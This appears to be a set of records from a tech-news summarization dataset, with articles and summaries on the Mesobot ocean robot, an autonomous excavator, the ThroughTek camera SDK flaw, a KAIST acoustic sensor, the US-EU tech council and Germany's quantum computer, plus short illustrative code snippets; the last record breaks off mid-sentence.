Woods Hole, MA (June 16, 2021) -- An innovative underwater robot known as Mesobot is providing researchers with deeper insight into the vast mid-ocean region known as the "twilight zone." Capable of tracking and recording high-resolution images of slow-moving and fragile zooplankton, gelatinous animals, and particles, Mesobot greatly expands scientists' ability to observe creatures in their mesopelagic habitat with minimal disturbance. This advance in engineering will enable greater understanding of the role these creatures play in transporting carbon dioxide from the atmosphere to the deep sea, as well as how commercial exploitation of twilight zone fisheries might affect the marine ecosystem. In a paper published June 16 in Science Robotics , Woods Hole Oceanographic Institution (WHOI) senior scientist Dana Yoerger presents Mesobot as a versatile vehicle for achieving a number of science objectives in the twilight zone. " Mesobot was conceived to complement and fill important gaps not served by existing technologies and platforms," said Yoerger. "We expect that Mesobot will emerge as a vital tool for observing midwater organisms for extended periods, as well as rapidly identifying species observed from vessel biosonars. Because Mesobot can survey, track, and record compelling imagery, we hope to reveal previously unknown behaviors, species interactions, morphological structures, and the use of bioluminescence." Co-authored by research scientists and engineers from WHOI, MBARI (Monterey Bay Aquarium Research Institute), and Stanford University, the paper outlines the robot's success in autonomously tracking two gelatinous marine creatures during a 2019 research cruise in Monterey Bay. High-definition video revealed a "dinner plate" jellyfish "ramming" a siphonophore, which narrowly escaped the jelly's venomous tentacles. Mesobot also recorded a 30-minute video of a giant larvacean, which appears to be nearly motionless but is actually riding internal waves that rise and fall 6 meters (20 feet). These observations represent the first time that a self-guided robot has tracked these small, clear creatures as they move through the water column like a "parcel of water," said Yoerger. " Mesobot has the potential to change how we observe animals moving through space and time in a way that we've never been able to do before," said Kakani Katija, MBARI principal engineer. "As we continue to develop and improve on the vehicle, we hope to observe many other mysterious and captivating animals in the midwaters of the ocean, including the construction and disposal of carbon-rich giant larvacean 'snot palaces.'"
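Mesobot's actual control software is not shown here; the snippet below is only a generic illustration of the closed-loop idea behind following a slow-moving animal with minimal disturbance: convert the target's position and apparent size in the camera frame into gentle thruster corrections. The frame size, gains, and sign conventions are all assumptions.

```python
from dataclasses import dataclass

FRAME_W, FRAME_H = 1920, 1080      # assumed camera resolution
K_SWAY, K_HEAVE, K_SURGE = 0.002, 0.002, 0.5
TARGET_AREA_FRAC = 0.02            # desired apparent size of the animal in the frame

@dataclass
class ThrusterCommand:
    surge: float   # forward/back
    heave: float   # up/down
    sway: float    # left/right

def track_step(bbox):
    """bbox = (x, y, w, h) of the detected animal in pixels; return a gentle correction."""
    x, y, w, h = bbox
    cx, cy = x + w / 2.0, y + h / 2.0
    err_x = cx - FRAME_W / 2.0                        # + means target is right of center
    err_y = cy - FRAME_H / 2.0                        # + means target is below center
    err_size = TARGET_AREA_FRAC - (w * h) / float(FRAME_W * FRAME_H)
    return ThrusterCommand(surge=K_SURGE * err_size,  # close in if the target looks small
                           heave=K_HEAVE * err_y,     # move down if the target sits low in frame
                           sway=K_SWAY * err_x)       # translate toward the target laterally

print(track_step((1200, 400, 120, 90)))
```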
Scientists at the Woods Hole Oceanographic Institution (WHOI), the Monterey Bay Aquarium Research Institute (MBARI), and Stanford University used the underwater robot Mesobot to track and capture high-resolution images of slow-moving organisms inhabiting the mid-ocean "twilight zone" region. Mesobot uses an array of oceanographic and acoustic survey sensors, and can be operated remotely through a fiberoptic cable linked to a ship, follow pre-programmed missions, or autonomously track targets at depths of up to 1,000 meters (3,300 feet). MBARI's Kakani Katija said, "Mesobot has the potential to change how we observe animals moving through space and time in a way that we've never been able to do before."
[]
[]
[]
scitechnews
None
None
None
None
Scientists at the Woods Hole Oceanographic Institution (WHOI), the Monterey Bay Aquarium Research Institute (MBARI), and Stanford University used the underwater robot Mesobot to track and capture high-resolution images of slow-moving organisms inhabiting the mid-ocean "twilight zone" region. Mesobot uses an array of oceanographic and acoustic survey sensors, and can be operated remotely through a fiberoptic cable linked to a ship, follow pre-programmed missions, or autonomously track targets at depths of up to 1,000 meters (3,300 feet). MBARI's Kakani Katija said, "Mesobot has the potential to change how we observe animals moving through space and time in a way that we've never been able to do before." Woods Hole, MA (June 16, 2021) -- An innovative underwater robot known as Mesobot is providing researchers with deeper insight into the vast mid-ocean region known as the "twilight zone." Capable of tracking and recording high-resolution images of slow-moving and fragile zooplankton, gelatinous animals, and particles, Mesobot greatly expands scientists' ability to observe creatures in their mesopelagic habitat with minimal disturbance. This advance in engineering will enable greater understanding of the role these creatures play in transporting carbon dioxide from the atmosphere to the deep sea, as well as how commercial exploitation of twilight zone fisheries might affect the marine ecosystem. In a paper published June 16 in Science Robotics , Woods Hole Oceanographic Institution (WHOI) senior scientist Dana Yoerger presents Mesobot as a versatile vehicle for achieving a number of science objectives in the twilight zone. " Mesobot was conceived to complement and fill important gaps not served by existing technologies and platforms," said Yoerger. "We expect that Mesobot will emerge as a vital tool for observing midwater organisms for extended periods, as well as rapidly identifying species observed from vessel biosonars. Because Mesobot can survey, track, and record compelling imagery, we hope to reveal previously unknown behaviors, species interactions, morphological structures, and the use of bioluminescence." Co-authored by research scientists and engineers from WHOI, MBARI (Monterey Bay Aquarium Research Institute), and Stanford University, the paper outlines the robot's success in autonomously tracking two gelatinous marine creatures during a 2019 research cruise in Monterey Bay. High-definition video revealed a "dinner plate" jellyfish "ramming" a siphonophore, which narrowly escaped the jelly's venomous tentacles. Mesobot also recorded a 30-minute video of a giant larvacean, which appears to be nearly motionless but is actually riding internal waves that rise and fall 6 meters (20 feet). These observations represent the first time that a self-guided robot has tracked these small, clear creatures as they move through the water column like a "parcel of water," said Yoerger. " Mesobot has the potential to change how we observe animals moving through space and time in a way that we've never been able to do before," said Kakani Katija, MBARI principal engineer. "As we continue to develop and improve on the vehicle, we hope to observe many other mysterious and captivating animals in the midwaters of the ocean, including the construction and disposal of carbon-rich giant larvacean 'snot palaces.'"
232
Autonomous Walking Excavator Can Build Walls, Dig Trenches
A construction vehicle can operate autonomously on rough terrain, thanks to a team of Swiss-German engineers that adapted a walking excavator to perform various tasks. Researchers at ETH Zurich in Switzerland made the prototype Hydraulic Excavator for an Autonomous Purpose (HEAP) autonomous through the use of algorithms, control mechanisms, and Light Detection and Ranging (LiDAR). The 12-ton HEAP was programmed to use an excavator bucket and a two-finger gripper, and was able to construct a four-meter (13-foot) -high stone wall, grab trees for mock forestry work, and dig out a trench containing live ammunition from World War II. ETH Zurich's Dominic Jud said one of the biggest challenges in switching the excavator from human operation to a computer running open source Ubuntu software was reengineering the cabin controls to drive the hydraulic pumps. Jud said HEAP is roughly as accurate as human operators in executing tasks, although not yet as quick.
[]
[]
[]
scitechnews
None
None
None
None
A construction vehicle can operate autonomously on rough terrain, thanks to a team of Swiss-German engineers that adapted a walking excavator to perform various tasks. Researchers at ETH Zurich in Switzerland made the prototype Hydraulic Excavator for an Autonomous Purpose (HEAP) autonomous through the use of algorithms, control mechanisms, and Light Detection and Ranging (LiDAR). The 12-ton HEAP was programmed to use an excavator bucket and a two-finger gripper, and was able to construct a four-meter (13-foot) -high stone wall, grab trees for mock forestry work, and dig out a trench containing live ammunition from World War II. ETH Zurich's Dominic Jud said one of the biggest challenges in switching the excavator from human operation to a computer running open source Ubuntu software was reengineering the cabin controls to drive the hydraulic pumps. Jud said HEAP is roughly as accurate as human operators in executing tasks, although not yet as quick.
233
ThroughTek Flaw Opens Millions of Connected Cameras to Eavesdropping
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday issued an advisory regarding a critical software supply-chain flaw impacting ThroughTek's software development kit (SDK) that could be abused by an adversary to gain improper access to audio and video streams. "Successful exploitation of this vulnerability could permit unauthorized access to sensitive information, such as camera audio/video feeds," CISA said in the alert. ThroughTek's point-to-point ( P2P ) SDK is widely used by IoT devices with video surveillance or audio/video transmission capability such as IP cameras, baby and pet monitoring cameras, smart home appliances, and sensors to provide remote access to the media content over the internet. Tracked as CVE-2021-32934 (CVSS score: 9.1), the shortcoming affects ThroughTek P2P products, versions 3.1.5 and before as well as SDK versions with nossl tag, and stems from a lack of sufficient protection when transferring data between the local device and ThroughTek's servers. The flaw was reported by Nozomi Networks in March 2021, which noted that the use of vulnerable security cameras could leave critical infrastructure operators at risk by exposing sensitive business, production, and employee information. "The [P2P] protocol used by ThroughTek lacks a secure key exchange [and] relies instead on an obfuscation scheme based on a fixed key," the San Francisco-headquartered IoT security firm said . "Since this traffic traverses the internet, an attacker that is able to access it can reconstruct the audio/video stream." To demonstrate the vulnerability, the researchers created a proof-of-concept (PoC) exploit that deobfuscates on-the-fly packets from the network traffic. ThroughTek recommends original equipment manufacturers (OEMs) using SDK 3.1.10 and above to enable AuthKey and DTLS , and those relying on an SDK version prior to 3.1.10 to upgrade the library to version 3.3.1.0 or v3.4.2.0 and enable AuthKey/DTLS. Since the flaw affects a software component that's part of the supply chain for many OEMs of consumer-grade security cameras and IoT devices, the fallout from such an exploitation could effectively breach the security of the devices, enabling the attacker to access and view confidential audio or video streams. "Because ThroughTek's P2P library has been integrated by multiple vendors into many different devices over the years, it's virtually impossible for a third-party to track the affected products," the researchers said.
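The advisory's core point is that a fixed, device-wide key provides obfuscation rather than encryption. The toy repeating-key XOR below is not ThroughTek's actual scheme; it only illustrates why any observer who recovers the shared key, for example by reverse-engineering a single device, can decode every stream, which is exactly the failure a negotiated per-session key such as DTLS is meant to prevent.

```python
FIXED_KEY = b"example-key"            # hypothetical key baked into every device

def xor_obfuscate(data: bytes, key: bytes = FIXED_KEY) -> bytes:
    """Repeating-key XOR: the same call both 'obfuscates' and 'deobfuscates'."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

packet = b"frame-0001: camera audio/video payload ..."
on_the_wire = xor_obfuscate(packet)        # what a network sniffer would capture
recovered = xor_obfuscate(on_the_wire)     # anyone holding the fixed key reverses it

assert recovered == packet
print(recovered.decode())
```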
An advisory issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of a major software supply-chain flaw in cloud security provider ThroughTek's point-to-point (P2P) software development kit (SDK), which could allow unauthorized access to the audio and video streams from millions of connected cameras. The flaw stems from insufficient protection when transferring data between the local device and ThroughTek's servers; it impacts ThroughTek P2P product versions 3.1.5 and before, and SDK versions with NoSSL tag. Security firm Nozomi Networks reported the bug in March, warning that vulnerable security cameras could place critical infrastructure operators at risk by compromising sensitive business, production, and employee data.
[]
[]
[]
scitechnews
None
None
None
None
An advisory issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of a major software supply-chain flaw in cloud security provider ThroughTek's point-to-point (P2P) software development kit (SDK), which could allow unauthorized access to the audio and video streams from millions of connected cameras. The flaw stems from insufficient protection when transferring data between the local device and ThroughTek's servers; it impacts ThroughTek P2P product versions 3.1.5 and before, and SDK versions with NoSSL tag. Security firm Nozomi Networks reported the bug in March, warning that vulnerable security cameras could place critical infrastructure operators at risk by compromising sensitive business, production, and employee data. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday issued an advisory regarding a critical software supply-chain flaw impacting ThroughTek's software development kit (SDK) that could be abused by an adversary to gain improper access to audio and video streams. "Successful exploitation of this vulnerability could permit unauthorized access to sensitive information, such as camera audio/video feeds," CISA said in the alert. ThroughTek's point-to-point ( P2P ) SDK is widely used by IoT devices with video surveillance or audio/video transmission capability such as IP cameras, baby and pet monitoring cameras, smart home appliances, and sensors to provide remote access to the media content over the internet. Tracked as CVE-2021-32934 (CVSS score: 9.1), the shortcoming affects ThroughTek P2P products, versions 3.1.5 and before as well as SDK versions with nossl tag, and stems from a lack of sufficient protection when transferring data between the local device and ThroughTek's servers. The flaw was reported by Nozomi Networks in March 2021, which noted that the use of vulnerable security cameras could leave critical infrastructure operators at risk by exposing sensitive business, production, and employee information. "The [P2P] protocol used by ThroughTek lacks a secure key exchange [and] relies instead on an obfuscation scheme based on a fixed key," the San Francisco-headquartered IoT security firm said . "Since this traffic traverses the internet, an attacker that is able to access it can reconstruct the audio/video stream." To demonstrate the vulnerability, the researchers created a proof-of-concept (PoC) exploit that deobfuscates on-the-fly packets from the network traffic. ThroughTek recommends original equipment manufacturers (OEMs) using SDK 3.1.10 and above to enable AuthKey and DTLS , and those relying on an SDK version prior to 3.1.10 to upgrade the library to version 3.3.1.0 or v3.4.2.0 and enable AuthKey/DTLS. Since the flaw affects a software component that's part of the supply chain for many OEMs of consumer-grade security cameras and IoT devices, the fallout from such an exploitation could effectively breach the security of the devices, enabling the attacker to access and view confidential audio or video streams. "Because ThroughTek's P2P library has been integrated by multiple vendors into many different devices over the years, it's virtually impossible for a third-party to track the affected products," the researchers said.
235
Biomimetic Resonant Acoustic Sensor Detecting Far-Distant Voices Accurately to Hit the Market
A KAIST research team led by Professor Keon Jae Lee from the Department of Materials Science and Engineering has developed a bioinspired flexible piezoelectric acoustic sensor with multi-resonant ultrathin piezoelectric membrane mimicking the basilar membrane of the human cochlea. The flexible acoustic sensor has been miniaturized for embedding into smartphones and the first commercial prototype is ready for accurate and far-distant voice detection. In 2018, Professor Lee presented the first concept of a flexible piezoelectric acoustic sensor, inspired by the fact that humans can accurately detect far-distant voices using a multi-resonant trapezoidal membrane with 20,000 hair cells. However, previous acoustic sensors could not be integrated into commercial products like smartphones and AI speakers due to their large device size. In this work, the research team fabricated a mobile-sized acoustic sensor by adopting ultrathin piezoelectric membranes with high sensitivity. Simulation studies proved that the ultrathin polymer underneath inorganic piezoelectric thin film can broaden the resonant bandwidth to cover the entire voice frequency range using seven channels. Based on this theory, the research team successfully demonstrated the miniaturized acoustic sensor mounted in commercial smartphones and AI speakers for machine learning-based biometric authentication and voice processing. (Please refer to the explanatory movie KAIST Flexible Piezoelectric Mobile Acoustic Sensor). The resonant mobile acoustic sensor has superior sensitivity and multi-channel signals compared to conventional condenser microphones with a single channel, and it has shown highly accurate and far-distant speaker identification with a small amount of voice training data. The error rate of speaker identification was significantly reduced by 56% (with 150 training datasets) and 75% (with 2,800 training datasets) compared to that of a MEMS condenser device. Professor Lee said, "Recently, Google has been targeting the 'Wolverine Project' on far-distant voice separation from multi-users for next-generation AI user interfaces. I expect that our multi-channel resonant acoustic sensor with abundant voice information is the best fit for this application. Currently, the mass production process is on the verge of completion, so we hope that this will be used in our daily lives very soon." Professor Lee also established a startup company called Fronics Inc., located both in Korea and U.S. (branch office) to commercialize this flexible acoustic sensor and is seeking collaborations with global AI companies. These research results entitled "Biomimetic and Flexible Piezoelectric Mobile Acoustic Sensors with Multi-Resonant Ultrathin Structures for Machine Learning Biometrics" were published in Science Advances in 2021 (7, eabe5683). < Figure: (a) Schematic illustration of the basilar membrane-inspired flexible piezoelectric mobile acoustic sensor (b) Real-time voice biometrics based on machine learning algorithms (c) The world's first commercial production of a mobile-sized acoustic sensor. > -Publication "Biomimetic and flexible piezoelectric mobile acoustic sensors with multiresonant ultrathin structures for machine learning biometrics," Science Advances (DOI: 10.1126/sciadv.abe5683) -Profile Professor Keon Jae Lee Department of Materials Science and Engineering Flexible and Nanobio Device Lab http://fand.kaist.ac.kr/ KAIST
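The paper's actual pipeline is not reproduced here; the sketch below only illustrates, with made-up data, how the outputs of seven resonant channels could be reduced to per-channel features and fed to an off-the-shelf classifier for speaker identification. The feature choice (log channel energy), the synthetic "speakers," and the random-forest model are assumptions, not the published method.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

N_CHANNELS, FS = 7, 8000          # seven resonant channels, assumed sample rate

def channel_energies(frames):
    """frames: (n_samples, 7) raw channel outputs -> per-channel log energy."""
    return np.log(np.mean(frames ** 2, axis=0) + 1e-9)

def synth_utterance(speaker_id, rng):
    """Toy data: each 'speaker' excites the seven channels with a different profile."""
    profile = 0.5 + 0.5 * np.abs(np.sin(speaker_id + np.arange(N_CHANNELS)))
    return rng.normal(0.0, profile, size=(FS, N_CHANNELS))    # one second of signal

rng = np.random.default_rng(1)
X = np.stack([channel_energies(synth_utterance(s, rng))
              for s in range(3) for _ in range(50)])
y = np.repeat(np.arange(3), 50)

model = RandomForestClassifier(n_estimators=50, random_state=0).fit(X, y)
probe = channel_energies(synth_utterance(2, rng))
print("predicted speaker:", model.predict(probe.reshape(1, -1))[0])
```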
Researchers at South Korea's Korea Advanced Institute of Science and Technology (KAIST) have developed a bioinspired flexible piezoelectric acoustic sensor with a multi-resonant ultrathin piezoelectric membrane that acts like the basilar membrane of the human cochlea to achieve accurate and far-distant voice detection. The miniaturized sensor can be embedded into smartphones and artificial intelligence speakers for machine learning-based biometric authentication and voice processing. Compared to a MEMS condenser microphone, the researchers found the speaker identification error rate for their resonant mobile acoustic sensor was 56% lower after it experienced 150 training datasets, and 75% lower after 2,800 training datasets.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at South Korea's Korea Advanced Institute of Science and Technology (KAIST) have developed a bioinspired flexible piezoelectric acoustic sensor with a multi-resonant ultrathin piezoelectric membrane that acts like the basilar membrane of the human cochlea to achieve accurate and far-distant voice detection. The miniaturized sensor can be embedded into smartphones and artificial intelligence speakers for machine learning-based biometric authentication and voice processing. Compared to a MEMS condenser microphone, the researchers found the speaker identification error rate for their resonant mobile acoustic sensor was 56% lower after it experienced 150 training datasets, and 75% lower after 2,800 training datasets. A KAIST research team led by Professor Keon Jae Lee from the Department of Materials Science and Engineering has developed a bioinspired flexible piezoelectric acoustic sensor with multi-resonant ultrathin piezoelectric membrane mimicking the basilar membrane of the human cochlea. The flexible acoustic sensor has been miniaturized for embedding into smartphones and the first commercial prototype is ready for accurate and far-distant voice detection. In 2018, Professor Lee presented the first concept of a flexible piezoelectric acoustic sensor, inspired by the fact that humans can accurately detect far-distant voices using a multi-resonant trapezoidal membrane with 20,000 hair cells. However, previous acoustic sensors could not be integrated into commercial products like smartphones and AI speakers due to their large device size. In this work, the research team fabricated a mobile-sized acoustic sensor by adopting ultrathin piezoelectric membranes with high sensitivity. Simulation studies proved that the ultrathin polymer underneath inorganic piezoelectric thin film can broaden the resonant bandwidth to cover the entire voice frequency range using seven channels. Based on this theory, the research team successfully demonstrated the miniaturized acoustic sensor mounted in commercial smartphones and AI speakers for machine learning-based biometric authentication and voice processing. (Please refer to the explanatory movie KAIST Flexible Piezoelectric Mobile Acoustic Sensor). The resonant mobile acoustic sensor has superior sensitivity and multi-channel signals compared to conventional condenser microphones with a single channel, and it has shown highly accurate and far-distant speaker identification with a small amount of voice training data. The error rate of speaker identification was significantly reduced by 56% (with 150 training datasets) and 75% (with 2,800 training datasets) compared to that of a MEMS condenser device. Professor Lee said, "Recently, Google has been targeting the 'Wolverine Project' on far-distant voice separation from multi-users for next-generation AI user interfaces. I expect that our multi-channel resonant acoustic sensor with abundant voice information is the best fit for this application. Currently, the mass production process is on the verge of completion, so we hope that this will be used in our daily lives very soon." Professor Lee also established a startup company called Fronics Inc., located both in Korea and U.S. (branch office) to commercialize this flexible acoustic sensor and is seeking collaborations with global AI companies. 
These research results entitled "Biomimetic and Flexible Piezoelectric Mobile Acoustic Sensors with Multi-Resonant Ultrathin Structures for Machine Learning Biometrics" were published in Science Advances in 2021 (7, eabe5683). < Figure: (a) Schematic illustration of the basilar membrane-inspired flexible piezoelectric mobile acoustic sensor (b) Real-time voice biometrics based on machine learning algorithms (c) The world's first commercial production of a mobile-sized acoustic sensor. > -Publication "Biomimetic and flexible piezoelectric mobile acoustic sensors with multiresonant ultrathin structures for machine learning biometrics," Science Advances (DOI: 10.1126/sciadv.abe5683) -Profile Professor Keon Jae Lee Department of Materials Science and Engineering Flexible and Nanobio Device Lab http://fand.kaist.ac.kr/ KAIST
236
U.S., EU Establish Trade, Technology Council to Compete with China
The United States and the European Union (EU) on Tuesday formally established a Trade and Technology Council (TTC) to coordinate on critical technology issues such as developing semiconductors, researching emerging fields and securing supply chains. The TTC was established as part of the U.S.-EU summit held Tuesday in Brussels and is intended to serve as a vehicle to compete with China on emerging technology issues. The nations committed in the official summit statement to driving "digital transformation that spurs trade and investment, strengthens our technological and industrial leadership, boosts innovation, and protects and promotes critical and emerging technologies and infrastructure." "We plan to cooperate on the development and deployment of new technologies based on our shared democratic values, including respect for human rights, and that encourages compatible standards and regulations," the statement read. The coalition noted that the TTC was meant to "kick-start" its agenda on trade and technology issues, with goals such as increasing international cooperation on technology supply chains, strengthening research partnerships and coordinating on standards development. "The notion here is that the United States and Europe laid the foundation for the world economy after World War II and now have to work together to write the rules of the road for the next generation, particularly in the areas of economics and emerging technologies," a senior administration official told reporters Monday ahead of the summit. One issue the TTC will address is the semiconductor shortage, which has had a major negative impact on industries such as the automobile sector, with semiconductors used in everything from cars to mobile devices. "Notably, we commit to building a U.S.-EU partnership on the rebalancing of global supply chains in semiconductors with a view to enhancing U.S. and EU respective security of supply as well as capacity to design and produce the most powerful and resource efficient semiconductors," the statement read. The TTC will also address issues such as setting standards for artificial intelligence and internet-connected technologies, on promoting green technologies, on securing critical telecommunications systems, and on what the U.S. and the EU described as a "misuse of technology threatening security and human rights." According to the senior administration official, the TTC will be co-chaired by Secretary of State Antony Blinken, Commerce Secretary Gina Raimondo and U.S. Trade Representative Katherine Tai. In addition to the TTC, the U.S.-EU summit also formally established a Joint Technology Competition Policy Dialogue to zero in on more cooperation in the tech sector on issues such as biotechnology and genomics. The group will also work to boost cybersecurity threat information sharing between the U.S. and the EU following a wave of cyberattacks. 
"I think we have a lot to deal with, from COVID-19 to whether or not we're in a position that we can generate the kind of strengthening in transatlantic trade and technological cooperation," President Biden said at the summit's plenary session on Tuesday. The senior administration official stressed to reporters the importance of the new groups in competing with China, noting that the country poses a "significant challenge" in the realms of trade and technology. "Dealing with China's nonmarket practices, its economic abuses and, of course, its efforts to shape the rules of the road on technology for the 21st century will be an important part of the work of this council," the official said. The U.S.-EU summit came on the heels of a meeting of the Group of Seven nations and of NATO, during which concerns about competition with China were discussed. China on Tuesday rebuked NATO for its critique, accusing it of having a "Cold War mentality."
A Trade and Technology Council (TTC) established by the U.S. and the EU this week will help to coordinate on critical technology issues and support their competition with China. An official statement from a U.S.-EU summit in Brussels read, "We plan to cooperate on the development and deployment of new technologies based on our shared democratic values, including respect for human rights, and that encourages compatible standards and regulations." Among other things, the TTC will address the semiconductor shortage, the creation of standards for artificial intelligence and Internet-connected technologies, and the securing of critical telecommunications systems. Also established at the summit was a Joint Technology Competition Policy Dialogue to foster cooperation on issues like biotechnology and genomics, and to increase U.S.-EU sharing of information on cybersecurity threats.
[]
[]
[]
scitechnews
None
None
None
None
A Trade and Technology Council (TTC) established by the U.S. and the EU this week will help to coordinate on critical technology issues and support their competition with China. An official statement from a U.S.-EU summit in Brussels read, "We plan to cooperate on the development and deployment of new technologies based on our shared democratic values, including respect for human rights, and that encourages compatible standards and regulations." Among other things, the TTC will address the semiconductor shortage, the creation of standards for artificial intelligence and Internet-connected technologies, and the securing of critical telecommunications systems. Also established at the summit was a Joint Technology Competition Policy Dialogue to foster cooperation on issues like biotechnology and genomics, and to increase U.S.-EU sharing of information on cybersecurity threats. The United States and the European Union (EU) on Tuesday formally established a Trade and Technology Council (TTC) to coordinate on critical technology issues such as developing semiconductors, researching emerging fields and securing supply chains. The TTC was established as part of the U.S.-EU summit held Tuesday in Brussels and is intended to serve as a vehicle to compete with China on emerging technology issues. The nations committed in the official summit statement to driving "digital transformation that spurs trade and investment, strengthens our technological and industrial leadership, boosts innovation, and protects and promotes critical and emerging technologies and infrastructure." "We plan to cooperate on the development and deployment of new technologies based on our shared democratic values, including respect for human rights, and that encourages compatible standards and regulations," the statement read. The coalition noted that the TTC was meant to "kick-start" its agenda on trade and technology issues, with goals such as increasing international cooperation on technology supply chains, strengthening research partnerships and coordinating on standards development. "The notion here is that the United States and Europe laid the foundation for the world economy after World War II and now have to work together to write the rules of the road for the next generation, particularly in the areas of economics and emerging technologies," a senior administration official told reporters Monday ahead of the summit. One issue the TTC will address is the semiconductor shortage, which has had a major negative impact on industries such as the automobile sector, with semiconductors used in everything from cars to mobile devices. "Notably, we commit to building a U.S.-EU partnership on the rebalancing of global supply chains in semiconductors with a view to enhancing U.S. and EU respective security of supply as well as capacity to design and produce the most powerful and resource efficient semiconductors," the statement read. The TTC will also address issues such as setting standards for artificial intelligence and internet-connected technologies, on promoting green technologies, on securing critical telecommunications systems, and on what the U.S. and the EU described as a "misuse of technology threatening security and human rights." According to the senior administration official, the TTC will be co-chaired by Secretary of State Antony Blinken, Commerce Secretary Gina Raimondo and U.S. Trade Representative Katherine Tai.
In addition to the TTC, the U.S.-EU summit also formally established a Joint Technology Competition Policy Dialogue to zero in on more cooperation in the tech sector on issues such as biotechnology and genomics. The group will also work to boost cybersecurity threat information sharing between the U.S. and the EU following a wave of cyberattacks. "I think we have a lot to deal with, from COVID-19 to whether or not we're in a position that we can generate the kind of strengthening in transatlantic trade and technological cooperation," President Biden said at the summit's plenary session on Tuesday. The senior administration official stressed to reporters the importance of the new groups in competing with China, noting that the country poses a "significant challenge" in the realms of trade and technology. "Dealing with China's nonmarket practices, its economic abuses and, of course, its efforts to shape the rules of the road on technology for the 21st century will be an important part of the work of this council," the official said. The U.S.-EU summit came on the heels of a meeting of the Group of Seven nations and of NATO, during which concerns about competition with China were discussed. China on Tuesday rebuked NATO for its critique, accusing it of having a "Cold War mentality."
237
Germany Unveils Quantum Computer to Keep Europe in Global Tech Race
Angela Merkel on Tuesday inaugurated a computer that uses subatomic particles to make millions of calculations in microseconds, making Germany a contender in the global race to develop the next-generation technology called quantum computing. "As far as research into quantum technologies is concerned, Germany is among the best of the world, and we intend to remain amongst the best of the world," the German chancellor - herself a quantum chemist - said during a launch event for the device. "We're in the midst of a very intense competition, and Germany has the intention to have an important say." Europe, the United States and China are locked in competition over who can build and exploit the most powerful computers. Quantum technology, while still in its infancy, promises to carry out previously impossible calculations at record speed. Germany hopes that quantum computing will spur innovation across industry - from transport and the environment to health. While traditional computers process "bits" of information that have the value 1 or 0, known as a binary code, quantum computers are able to process bits that can be 1 and 0 simultaneously, mirroring subatomic particle behavior. These quantum bits, also known as qubits, can run calculations much, much faster. Policymakers hope the tech will bring an economic windfall when applied to the economy. Self-driving cars, for example, could learn to drive more safely, and faster. The tech also promises to be able to crack sophisticated encryption. Benefits of quantum research accrue to countries that can host and use devices. Germany's computer, located near Stuttgart, is being built by U.S. tech company IBM and will be managed by Fraunhofer-Gesellschaft, Europe's leading organization for applied research. Researchers and companies will be able to develop and test their quantum algorithms and gather expertise by using the computer. Merkel's interest in the tech underscores the stakes for Germany and other European countries who are trying to build up a local tech sector and wean themselves off foreign providers. Though IBM's participation in the program highlights that even Germany isn't there yet. With few leading European quantum companies, IBM's providing both the computer itself, and the cloud it's connected to. Last year, Berlin announced a €2 billion investment in quantum over five years, and it can also tap into European Commission's €1 billion fund for quantum technologies. Still, Merkel acknowledged that Europe's behind and needed to catch up. "Quantum computing can play a ... key role in our endeavour to acquire technological and digital sovereignty," the chancellor said. "Of course we're not the only ones to realize that this is the case. The United States and China have invested enormous amounts of money." The U.S. and China currently hold the most patents on quantum computers and technology. The Chinese government reportedly spends at least $2.5 billion a year on quantum research. In 2018, Washington earmarked $1.2 billion for quantum research as part of its National Quantum Initiative Act. The federal government topped up the funding with other initiatives including $237 million in the 2021 budget. Both countries can also count on their tech giants including Alibaba, IBM and Microsoft. Amid tense discussions in Europe over who controls industrial data, Fraunhofer-Gesellschaft, the research institute, will store and process the data produced by the computer in IBM's data centers in Germany. 
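As a small aside on the "1 and 0 simultaneously" description above: a qubit is a unit vector of two complex amplitudes, and n qubits require 2**n amplitudes, which is the source of both the promised speedups and the cost of simulating them classically. The snippet below is a plain-numpy toy illustration, unrelated to the IBM system itself.

```python
import numpy as np

ket0 = np.array([1, 0], dtype=complex)
H = np.array([[1, 1], [1, -1]], dtype=complex) / np.sqrt(2)   # Hadamard gate

plus = H @ ket0                          # equal superposition of |0> and |1>
print("amplitudes:", plus)               # roughly [0.707, 0.707]
print("P(0), P(1):", np.abs(plus) ** 2)  # measuring gives 0 or 1 with equal odds

# Three qubits in superposition span 2**3 = 8 amplitudes at once.
state = plus
for _ in range(2):
    state = np.kron(state, plus)
print(state.size, "amplitudes:", state.round(3))
```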
"Orders will be sent to the quantum computer and can be further processed in traditional computers for data privacy and sovereignty, the quantum computer will be operated under German law," said Reimund Neugebauer, president of Fraunhofer-Gesellschaft at the launch. He said the institute has already concluded partnerships with companies and universities that will use the computer, but did not name them. Germany's minister for research Anja Karliczek said: "Building up this ecosystem is a very important question for security and sovereignty." "We also want to develop the hardware for quantum computing here in Germany, and I would like to emphasise that sovereignty doesn't mean we should isolate ourselves."
Germany unveiled a quantum computer this week. Under construction by IBM, the device will be managed by German research organization Fraunhofer-Gesellschaft, for use by researchers and companies developing and testing quantum algorithms. Germany announced last year a €2-billion (U.S.$2.37-billion) investment in quantum over the ensuing five years, supplemented by the European Commission's €1-billion (U.S.$1.19-billion) fund for quantum technologies. Chancellor Angela Merkel indicated that it is time for Europe to catch up to the U.S. and China, which hold the greatest number of patents related to quantum computing. Fraunhofer-Gesellschaft's Reimund Neugebauer said partnerships have been forged with companies and universities to use the computer, although he declined to name them.
[]
[]
[]
scitechnews
None
None
None
None
Germany unveiled a quantum computer this week. Under construction by IBM, the device will be managed by German research organization Fraunhofer-Gesellschaft, for use by researchers and companies developing and testing quantum algorithms. Germany announced last year a €2-billion (U.S.$2.37-billion) investment in quantum over the ensuing five years, supplemented by the European Commission's €1-billion (U.S.$1.19-billion) fund for quantum technologies. Chancellor Angela Merkel indicated that it is time for Europe to catch up to the U.S. and China, which hold the greatest number of patents related to quantum computing. Fraunhofer-Gesellschaft's Reimund Neugebauer said partnerships have been forged with companies and universities to use the computer, although he declined to name them. Angela Merkel on Tuesday inaugurated a computer that uses subatomic particles to make millions of calculations in microseconds, making Germany a contender in the global race to develop the next-generation technology called quantum computing. "As far as research into quantum technologies is concerned, Germany is among the best of the world, and we intend to remain amongst the best of the world," the German chancellor - herself a quantum chemist - said during a launch event for the device. "We're in the midst of a very intense competition, and Germany has the intention to have an important say." Europe, the United States and China are locked 